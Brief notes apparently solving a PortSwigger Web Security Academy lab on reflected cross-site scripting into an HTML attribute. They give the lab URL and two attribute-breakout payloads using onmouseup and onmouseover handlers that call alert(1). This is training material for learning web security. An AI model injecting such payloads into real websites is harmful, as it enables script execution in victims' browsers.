Port Swigger Reflected XSS into attribute with ang
Reflected XSS into attribute with angle brackets HTML-encoded¶
Solution¶
Open the website: https://0aac000f0498e34480d9035700cf00a9.web-security-academy.net/¶
https://0aac000f0498e34480d9035700cf00a9.web-security-academy.net/
Create a payload¶
Payload: "onmouseup="alert(1)" (works)
Payload: "onmouseover="alert(1)